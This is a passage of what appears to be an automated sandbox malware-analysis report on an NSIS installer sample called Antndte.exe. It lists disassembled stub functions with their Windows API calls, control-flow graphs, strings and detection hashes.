                                                                                                                                • Associated: 00000000.00000002.9986626526.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.9986626526.00000000004B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.9986908780.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_400000_Antndte.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: CreateInstance
                                                                                                                                • String ID: C:\Users\user\AppData\Local\Temp\Undige\trivant
                                                                                                                                • API String ID: 542301482-226500509
                                                                                                                                • Opcode ID: a3079df28c9350d7309c2a19df5477558aa8a9c325ce021c01e80fddd7990195
                                                                                                                                • Instruction ID: 2ba5a37aa1c239f751097cd18d9f1051e5d6a8806e2346af1523e8cbd5355f1b
                                                                                                                                • Opcode Fuzzy Hash: a3079df28c9350d7309c2a19df5477558aa8a9c325ce021c01e80fddd7990195
                                                                                                                                • Instruction Fuzzy Hash: 504139B5A00208AFCB10DFE4C988AAEBBB5FF48314F20457AF515EB2D1DB799941CB44
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 00401E43 Relevance: 3.0, APIs: 2, Instructions: 25COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                • ShowWindow.USER32(00000000,00000000), ref: 00401E61
                                                                                                                                • EnableWindow.USER32(00000000,00000000), ref: 00401E6C
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.9986550491.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.9986518374.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.9986589917.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.9986626526.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.9986626526.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.9986626526.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.9986626526.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.9986626526.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.9986626526.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.9986626526.00000000004B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.9986908780.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_400000_Antndte.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: Window$EnableShow
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 1136574915-0
                                                                                                                                • Opcode ID: 2eb542d08f3645705a96f7068f662fa96ba88c07949deaf1805fa2c2c225f25f
                                                                                                                                • Instruction ID: 09ae210f1740f3e2fd0b4033472822fcab18c129469b5f5a82ca29d8a3c9addd
                                                                                                                                • Opcode Fuzzy Hash: 2eb542d08f3645705a96f7068f662fa96ba88c07949deaf1805fa2c2c225f25f
                                                                                                                                • Instruction Fuzzy Hash: DEE09232E082008FD7149BA5AA494AD77B4EB84364720403FE112F11C1DA7848418F59
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 00402862 Relevance: 1.5, APIs: 1, Instructions: 30fileCOMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                • FindFirstFileW.KERNELBASE(00000000,?,00000002), ref: 00402871
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.9986550491.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.9986518374.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.9986589917.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.9986626526.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.9986626526.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.9986626526.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.9986626526.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.9986626526.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.9986626526.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.9986626526.00000000004B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.9986908780.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_400000_Antndte.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: FileFindFirst
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 1974802433-0
                                                                                                                                • Opcode ID: d3449d240157211f65d4661233ebdf21600f3235833f1e3ab3d1db94ad861236
                                                                                                                                • Instruction ID: dc4ef17723f846daade3f6bb5fabbbbae416fabd81b1269148e1e628f00bda2f
                                                                                                                                • Opcode Fuzzy Hash: d3449d240157211f65d4661233ebdf21600f3235833f1e3ab3d1db94ad861236
                                                                                                                                • Instruction Fuzzy Hash: 9DF08271A04104EFD710EBA4DD499ADB378EF00324F2105BBF515F61D1D7B44E449B1A
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 00403D3E Relevance: 48.3, APIs: 32, Instructions: 346windowstringCOMMON
                                                                                                                                Download Yara Rule

                                                                                                                                Control-flow Graph

                                                                                                                                • Executed
                                                                                                                                • Not Executed
                                                                                                                                control_flow_graph 190 403d3e-403d50 191 403e91-403ea0 190->191 192 403d56-403d5c 190->192 194 403ea2-403eea GetDlgItem * 2 call 404217 SetClassLongW call 40140b 191->194 195 403eef-403f04 191->195 192->191 193 403d62-403d6b 192->193 196 403d80-403d83 193->196 197 403d6d-403d7a SetWindowPos 193->197 194->195 199 403f44-403f49 call 404263 195->199 200 403f06-403f09 195->200 202 403d85-403d97 ShowWindow 196->202 203 403d9d-403da3 196->203 197->196 208 403f4e-403f69 199->208 205 403f0b-403f16 call 401389 200->205 206 403f3c-403f3e 200->206 202->203 209 403da5-403dba DestroyWindow 203->209 210 403dbf-403dc2 203->210 205->206 227 403f18-403f37 SendMessageW 205->227 206->199 207 4041e4 206->207 215 4041e6-4041ed 207->215 213 403f72-403f78 208->213 214 403f6b-403f6d call 40140b 208->214 216 4041c1-4041c7 209->216 218 403dc4-403dd0 SetWindowLongW 210->218 219 403dd5-403ddb 210->219 223 4041a2-4041bb DestroyWindow EndDialog 213->223 224 403f7e-403f89 213->224 214->213 216->207 222 4041c9-4041cf 216->222 218->215 225 403de1-403df2 GetDlgItem 219->225 226 403e7e-403e8c call 40427e 219->226 222->207 229 4041d1-4041da ShowWindow 222->229 223->216 224->223 230 403f8f-403fdc call 4062a4 call 404217 * 3 GetDlgItem 224->230 231 403e11-403e14 225->231 232 403df4-403e0b SendMessageW IsWindowEnabled 225->232 226->215 227->215 229->207 260 403fe6-404022 ShowWindow KiUserCallbackDispatcher call 404239 EnableWindow 230->260 261 403fde-403fe3 230->261 235 403e16-403e17 231->235 236 403e19-403e1c 231->236 232->207 232->231 240 403e47-403e4c call 4041f0 235->240 237 403e2a-403e2f 236->237 238 403e1e-403e24 236->238 241 403e65-403e78 SendMessageW 237->241 243 403e31-403e37 237->243 238->241 242 403e26-403e28 238->242 240->226 241->226 242->240 246 403e39-403e3f call 40140b 243->246 247 403e4e-403e57 call 40140b 243->247 256 403e45 246->256 247->226 257 403e59-403e63 247->257 256->240 257->256 264 404024-404025 260->264 265 404027 260->265 261->260 266 404029-404057 GetSystemMenu EnableMenuItem SendMessageW 264->266 265->266 267 404059-40406a SendMessageW 266->267 268 40406c 266->268 269 404072-4040b1 call 40424c call 403d1f call 406282 lstrlenW call 4062a4 SetWindowTextW call 401389 267->269 268->269 269->208 280 4040b7-4040b9 269->280 280->208 281 4040bf-4040c3 280->281 282 4040e2-4040f6 DestroyWindow 281->282 283 4040c5-4040cb 281->283 282->216 285 4040fc-404129 CreateDialogParamW 282->285 283->207 284 4040d1-4040d7 283->284 284->208 286 4040dd 284->286 285->216 287 40412f-404186 call 404217 GetDlgItem GetWindowRect ScreenToClient SetWindowPos call 401389 285->287 286->207 287->207 292 404188-40419b ShowWindow call 404263 287->292 294 4041a0 292->294 294->216
                                                                                                                                APIs
                                                                                                                                • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403D7A
                                                                                                                                • ShowWindow.USER32(?), ref: 00403D97
                                                                                                                                • DestroyWindow.USER32 ref: 00403DAB
                                                                                                                                • SetWindowLongW.USER32(?,00000000,00000000), ref: 00403DC7
                                                                                                                                • GetDlgItem.USER32(?,?), ref: 00403DE8
                                                                                                                                • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00403DFC
                                                                                                                                • IsWindowEnabled.USER32(00000000), ref: 00403E03
                                                                                                                                • GetDlgItem.USER32(?,?), ref: 00403EB1
                                                                                                                                • GetDlgItem.USER32(?,00000002), ref: 00403EBB
                                                                                                                                • SetClassLongW.USER32(?,000000F2,?), ref: 00403ED5
                                                                                                                                • SendMessageW.USER32(0000040F,00000000,?,?), ref: 00403F26
                                                                                                                                • GetDlgItem.USER32(?,00000003), ref: 00403FCC
                                                                                                                                • ShowWindow.USER32(00000000,?), ref: 00403FED
                                                                                                                                • KiUserCallbackDispatcher.NTDLL(?,?), ref: 00403FFF
                                                                                                                                • EnableWindow.USER32(?,?), ref: 0040401A
                                                                                                                                • GetSystemMenu.USER32(?,00000000,0000F060,?), ref: 00404030
                                                                                                                                • EnableMenuItem.USER32(00000000), ref: 00404037
                                                                                                                                • SendMessageW.USER32(?,000000F4,00000000,?), ref: 0040404F
                                                                                                                                • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 00404062
                                                                                                                                • lstrlenW.KERNEL32(0042D248,?,0042D248,00000000), ref: 0040408C
                                                                                                                                • SetWindowTextW.USER32(?,0042D248), ref: 004040A0
                                                                                                                                • ShowWindow.USER32(?,0000000A), ref: 004041D4
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.9986550491.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.9986518374.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.9986589917.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.9986626526.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.9986626526.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.9986626526.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.9986626526.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.9986626526.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.9986626526.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.9986626526.00000000004B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.9986908780.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_400000_Antndte.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: Window$Item$MessageSend$Show$EnableLongMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 3282139019-0
                                                                                                                                • Opcode ID: e1db8d192186585ff235057a04b2e8ab0b27ba576f51f22eac3cb3cf97519198
                                                                                                                                • Instruction ID: 2b8d66c2e1a38ac8fa8a62e4dcdff4cf04ad9fa750ea4aef2484392c4ac96c84
                                                                                                                                • Opcode Fuzzy Hash: e1db8d192186585ff235057a04b2e8ab0b27ba576f51f22eac3cb3cf97519198
                                                                                                                                • Instruction Fuzzy Hash: 3EC1D2B1600200AFDB216F61ED89E2B3A68FB94706F04057EF641B51F1CB799982DB6D
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 00403990 Relevance: 45.7, APIs: 13, Strings: 13, Instructions: 215stringregistryCOMMON
                                                                                                                                Download Yara Rule

                                                                                                                                Control-flow Graph

                                                                                                                                • Executed
                                                                                                                                • Not Executed
                                                                                                                                control_flow_graph 295 403990-4039a8 call 40665c 298 4039aa-4039ba call 4061c9 295->298 299 4039bc-4039f3 call 406150 295->299 308 403a16-403a3f call 403c66 call 405c5b 298->308 304 4039f5-403a06 call 406150 299->304 305 403a0b-403a11 lstrcatW 299->305 304->305 305->308 313 403ad1-403ad9 call 405c5b 308->313 314 403a45-403a4a 308->314 320 403ae7-403b0c LoadImageW 313->320 321 403adb-403ae2 call 4062a4 313->321 314->313 315 403a50-403a6a call 406150 314->315 319 403a6f-403a78 315->319 319->313 322 403a7a-403a7e 319->322 324 403b8d-403b95 call 40140b 320->324 325 403b0e-403b3e RegisterClassW 320->325 321->320 326 403a90-403a9c lstrlenW 322->326 327 403a80-403a8d call 405b80 322->327 338 403b97-403b9a 324->338 339 403b9f-403baa call 403c66 324->339 328 403b44-403b88 SystemParametersInfoW CreateWindowExW 325->328 329 403c5c 325->329 333 403ac4-403acc call 405b53 call 406282 326->333 334 403a9e-403aac lstrcmpiW 326->334 327->326 328->324 332 403c5e-403c65 329->332 333->313 334->333 337 403aae-403ab8 GetFileAttributesW 334->337 342 403aba-403abc 337->342 343 403abe-403abf call 405b9f 337->343 338->332 348 403bb0-403bca ShowWindow call 4065ec 339->348 349 403c33-403c34 call 4053b9 339->349 342->333 342->343 343->333 356 403bd6-403be8 GetClassInfoW 348->356 357 403bcc-403bd1 call 4065ec 348->357 353 403c39-403c3b 349->353 354 403c55-403c57 call 40140b 353->354 355 403c3d-403c43 353->355 354->329 355->338 358 403c49-403c50 call 40140b 355->358 361 403c00-403c23 DialogBoxParamW call 40140b 356->361 362 403bea-403bfa GetClassInfoW RegisterClassW 356->362 357->356 358->338 366 403c28-403c31 call 4038e0 361->366 362->361 366->332
                                                                                                                                APIs
                                                                                                                                  • Part of subcall function 0040665C: GetModuleHandleA.KERNEL32(?,00000020,?,004033E5,0000000A), ref: 0040666E
                                                                                                                                  • Part of subcall function 0040665C: GetProcAddress.KERNEL32(00000000,?), ref: 00406689
                                                                                                                                • lstrcatW.KERNEL32(1033,0042D248), ref: 00403A11
                                                                                                                                • lstrlenW.KERNEL32(Call,?,?,?,Call,00000000,C:\Users\user\AppData\Local\Temp\Undige,1033,0042D248,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042D248,00000000,00000002,C:\Users\user\AppData\Local\Temp\), ref: 00403A91
                                                                                                                                • lstrcmpiW.KERNEL32(?,.exe,Call,?,?,?,Call,00000000,C:\Users\user\AppData\Local\Temp\Undige,1033,0042D248,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042D248,00000000), ref: 00403AA4
                                                                                                                                • GetFileAttributesW.KERNEL32(Call), ref: 00403AAF
                                                                                                                                • LoadImageW.USER32(00000067,?,00000000,00000000,00008040,C:\Users\user\AppData\Local\Temp\Undige), ref: 00403AF8
                                                                                                                                  • Part of subcall function 004061C9: wsprintfW.USER32 ref: 004061D6
                                                                                                                                • RegisterClassW.USER32(00433E80), ref: 00403B35
                                                                                                                                • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00403B4D
                                                                                                                                • CreateWindowExW.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403B82
                                                                                                                                • ShowWindow.USER32(00000005,00000000), ref: 00403BB8
                                                                                                                                • GetClassInfoW.USER32(00000000,RichEdit20W,00433E80), ref: 00403BE4
                                                                                                                                • GetClassInfoW.USER32(00000000,RichEdit,00433E80), ref: 00403BF1
                                                                                                                                • RegisterClassW.USER32(00433E80), ref: 00403BFA
                                                                                                                                • DialogBoxParamW.USER32(?,00000000,00403D3E,00000000), ref: 00403C19
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.9986550491.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.9986518374.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.9986589917.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.9986626526.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.9986626526.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.9986626526.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.9986626526.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.9986626526.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.9986626526.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.9986626526.00000000004B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.9986908780.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_400000_Antndte.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                                                                                                                • String ID: "C:\Users\user\Desktop\Antndte.exe"$.DEFAULT\Control Panel\International$.exe$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\Undige$Call$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb
                                                                                                                                • API String ID: 1975747703-799513095
                                                                                                                                • Opcode ID: fad5457d8f38b8c09c8a39ec35915e90d6e0e04314475c23c8e641fe097f6c3c
                                                                                                                                • Instruction ID: b69a5953a59a380dedfc974e339360e26c19c43312473aa69c5b527d033ca56b
                                                                                                                                • Opcode Fuzzy Hash: fad5457d8f38b8c09c8a39ec35915e90d6e0e04314475c23c8e641fe097f6c3c
                                                                                                                                • Instruction Fuzzy Hash: 7061A8312003006ED320BF669D46F673A6CEB84B5AF40053FF945B62E2DB7DA9418A2D
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 00402EC1 Relevance: 24.7, APIs: 5, Strings: 9, Instructions: 182COMMON
                                                                                                                                Download Yara Rule

                                                                                                                                Control-flow Graph

                                                                                                                                • Executed
                                                                                                                                • Not Executed
                                                                                                                                control_flow_graph 369 402ec1-402f0f GetTickCount GetModuleFileNameW call 405d74 372 402f11-402f16 369->372 373 402f1b-402f49 call 406282 call 405b9f call 406282 GetFileSize 369->373 374 4030f3-4030f7 372->374 381 403036-403044 call 402e5d 373->381 382 402f4f 373->382 388 403046-403049 381->388 389 403099-40309e 381->389 384 402f54-402f6b 382->384 386 402f6d 384->386 387 402f6f-402f78 call 403315 384->387 386->387 396 4030a0-4030a8 call 402e5d 387->396 397 402f7e-402f85 387->397 391 40304b-403063 call 40332b call 403315 388->391 392 40306d-403097 GlobalAlloc call 40332b call 4030fa 388->392 389->374 391->389 420 403065-40306b 391->420 392->389 418 4030aa-4030bb 392->418 396->389 398 403001-403005 397->398 399 402f87-402f9b call 405d2f 397->399 406 403007-40300e call 402e5d 398->406 407 40300f-403015 398->407 399->407 416 402f9d-402fa4 399->416 406->407 409 403024-40302e 407->409 410 403017-403021 call 40674f 407->410 409->384 417 403034 409->417 410->409 416->407 422 402fa6-402fad 416->422 417->381 423 4030c3-4030c8 418->423 424 4030bd 418->424 420->389 420->392 422->407 425 402faf-402fb6 422->425 426 4030c9-4030cf 423->426 424->423 425->407 427 402fb8-402fbf 425->427 426->426 428 4030d1-4030ec SetFilePointer call 405d2f 426->428 427->407 429 402fc1-402fe1 427->429 432 4030f1 428->432 429->389 431 402fe7-402feb 429->431 433 402ff3-402ffb 431->433 434 402fed-402ff1 431->434 432->374 433->407 435 402ffd-402fff 433->435 434->417 434->433 435->407
                                                                                                                                APIs
                                                                                                                                • GetTickCount.KERNEL32 ref: 00402ED2
                                                                                                                                • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\Antndte.exe,00000400,?,00000006,00000008,0000000A), ref: 00402EEE
                                                                                                                                  • Part of subcall function 00405D74: GetFileAttributesW.KERNELBASE(?,00402F01,C:\Users\user\Desktop\Antndte.exe,80000000,00000003,?,00000006,00000008,0000000A), ref: 00405D78
                                                                                                                                  • Part of subcall function 00405D74: CreateFileW.KERNELBASE(?,?,?,00000000,?,00000001,00000000,?,00000006,00000008,0000000A), ref: 00405D9A
                                                                                                                                • GetFileSize.KERNEL32(00000000,00000000,00443000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\Antndte.exe,C:\Users\user\Desktop\Antndte.exe,80000000,00000003,?,00000006,00000008,0000000A), ref: 00402F3A
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.9986550491.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.9986518374.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.9986589917.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.9986626526.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.9986626526.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.9986626526.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.9986626526.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.9986626526.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.9986626526.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.9986626526.00000000004B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.9986908780.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_400000_Antndte.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: File$AttributesCountCreateModuleNameSizeTick
                                                                                                                                • String ID: "C:\Users\user\Desktop\Antndte.exe"$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\Antndte.exe$Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
                                                                                                                                • API String ID: 4283519449-2219871103
                                                                                                                                • Opcode ID: 26585f3882fdea94a938261bd68019460abcc7be0e9174194b748f0908e10cc7
                                                                                                                                • Instruction ID: 5fb561c1f1da7fe65fe29aa304fda9dad36d264b5387f138e6185790fd874317
                                                                                                                                • Opcode Fuzzy Hash: 26585f3882fdea94a938261bd68019460abcc7be0e9174194b748f0908e10cc7
                                                                                                                                • Instruction Fuzzy Hash: 18510471902216AFDB20AF64DD85B9E7EB8FB00359F15403BF904B62C5C7789E408B6C
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 004062A4 Relevance: 19.5, APIs: 7, Strings: 4, Instructions: 209stringCOMMON
                                                                                                                                Download Yara Rule

                                                                                                                                Control-flow Graph

                                                                                                                                • Executed
                                                                                                                                • Not Executed
                                                                                                                                control_flow_graph 636 4062a4-4062af 637 4062b1-4062c0 636->637 638 4062c2-4062d8 636->638 637->638 639 4064f0-4064f6 638->639 640 4062de-4062eb 638->640 641 4064fc-406507 639->641 642 4062fd-40630a 639->642 640->639 643 4062f1-4062f8 640->643 644 406512-406513 641->644 645 406509-40650d call 406282 641->645 642->641 646 406310-40631c 642->646 643->639 645->644 648 406322-406360 646->648 649 4064dd 646->649 652 406480-406484 648->652 653 406366-406371 648->653 650 4064eb-4064ee 649->650 651 4064df-4064e9 649->651 650->639 651->639 656 406486-40648c 652->656 657 4064b7-4064bb 652->657 654 406373-406378 653->654 655 40638a 653->655 654->655 658 40637a-40637d 654->658 661 406391-406398 655->661 659 40649c-4064a8 call 406282 656->659 660 40648e-40649a call 4061c9 656->660 662 4064ca-4064db lstrlenW 657->662 663 4064bd-4064c5 call 4062a4 657->663 658->655 664 40637f-406382 658->664 674 4064ad-4064b3 659->674 660->674 666 40639a-40639c 661->666 667 40639d-40639f 661->667 662->639 663->662 664->655 670 406384-406388 664->670 666->667 672 4063a1-4063bf call 406150 667->672 673 4063da-4063dd 667->673 670->661 682 4063c4-4063c8 672->682 677 4063ed-4063f0 673->677 678 4063df-4063eb GetSystemDirectoryW 673->678 674->662 676 4064b5 674->676 683 406478-40647e call 406516 676->683 680 4063f2-406400 GetWindowsDirectoryW 677->680 681 40645b-40645d 677->681 679 40645f-406463 678->679 679->683 688 406465 679->688 680->681 681->679 685 406402-40640c 681->685 686 406468-40646b 682->686 687 4063ce-4063d5 call 4062a4 682->687 683->662 690 406426-40643c SHGetSpecialFolderLocation 685->690 691 40640e-406411 685->691 686->683 693 40646d-406473 lstrcatW 686->693 687->679 688->686 695 406457 690->695 696 40643e-406455 SHGetPathFromIDListW CoTaskMemFree 690->696 691->690 694 406413-40641a 691->694 693->683 698 406422-406424 694->698 695->681 696->679 696->695 698->679 698->690
                                                                                                                                APIs
                                                                                                                                • GetSystemDirectoryW.KERNEL32(Call,00000400), ref: 004063E5
                                                                                                                                • GetWindowsDirectoryW.KERNEL32(Call,00000400,00000000,Skipped: C:\Users\user\AppData\Local\Temp\nsm118D.tmp\System.dll,?,0040531D,Skipped: C:\Users\user\AppData\Local\Temp\nsm118D.tmp\System.dll,00000000), ref: 004063F8
                                                                                                                                • SHGetSpecialFolderLocation.SHELL32(0040531D,0041C000,00000000,Skipped: C:\Users\user\AppData\Local\Temp\nsm118D.tmp\System.dll,?,0040531D,Skipped: C:\Users\user\AppData\Local\Temp\nsm118D.tmp\System.dll,00000000), ref: 00406434
                                                                                                                                • SHGetPathFromIDListW.SHELL32(0041C000,Call), ref: 00406442
                                                                                                                                • CoTaskMemFree.OLE32(0041C000), ref: 0040644D
                                                                                                                                • lstrcatW.KERNEL32(Call,\Microsoft\Internet Explorer\Quick Launch), ref: 00406473
                                                                                                                                • lstrlenW.KERNEL32(Call,00000000,Skipped: C:\Users\user\AppData\Local\Temp\nsm118D.tmp\System.dll,?,0040531D,Skipped: C:\Users\user\AppData\Local\Temp\nsm118D.tmp\System.dll,00000000), ref: 004064CB
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.9986550491.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.9986518374.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.9986589917.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.9986626526.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.9986626526.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.9986626526.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.9986626526.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.9986626526.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.9986626526.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.9986626526.00000000004B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.9986908780.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_400000_Antndte.jbxd
                                                                                                                                Similarity
